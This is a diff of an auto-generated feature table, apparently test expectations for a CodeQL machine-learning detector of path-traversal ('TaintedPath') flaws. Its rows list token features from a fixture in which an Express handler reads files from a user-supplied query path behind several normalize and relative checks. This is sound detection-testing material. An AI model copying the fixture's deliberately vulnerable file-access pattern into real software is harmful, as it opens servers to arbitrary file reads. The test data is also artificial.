autogenerated/TaintedPath/normalizedPaths.js:288:21:288:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:288:21:288:27 | newpath | calleeImports | fs | @@ -9203,6 +77278,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:288:21:288:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:288:21:288:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:288:21:288:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:13 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:13 | newpath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:13 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:13 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:13 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:26 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:26 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:26 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:26 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:26 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:36 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:36 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:36 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:36 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:36 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:291:28:291:36 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:291:28:291:36 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:291:28:291:36 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:291:28:291:36 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:291:28:291:36 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:291:38:291:41 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:291:38:291:41 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:291:38:291:41 | path | calleeImports | path | @@ -9212,6 +77327,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:291:38:291:41 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:291:38:291:41 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:291:38:291:41 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:18 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:18 | relativePath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:18 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:18 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:18 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativ ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativ ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativ ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativ ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativ ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:31 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:31 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:31 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:31 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:31 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:40 | pathModule.relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:40 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:40 | pathModule.relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:40 | pathModule.relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:40 | pathModule.relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | exceptional return of pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | exceptional return of pathMod ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | exceptional return of pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:33:292:40 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:33:292:40 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:33:292:40 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:33:292:40 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:33:292:40 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:51 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:51 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:51 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:51 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:51 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:61 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:61 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:61 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:61 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:61 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | exceptional return of pathMod ... aceDir) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | exceptional return of pathMod ... aceDir) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | exceptional return of pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | pathMod ... aceDir) | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | pathMod ... aceDir) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | pathMod ... aceDir) | calleeImports | path | @@ -9221,6 +77391,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:292:42:292:75 | pathMod ... aceDir) | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:292:53:292:61 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:292:53:292:61 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:292:53:292:61 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:292:53:292:61 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:292:53:292:61 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:292:63:292:74 | workspaceDir | CalleeFlexibleAccessPath | pathModule.normalize | | 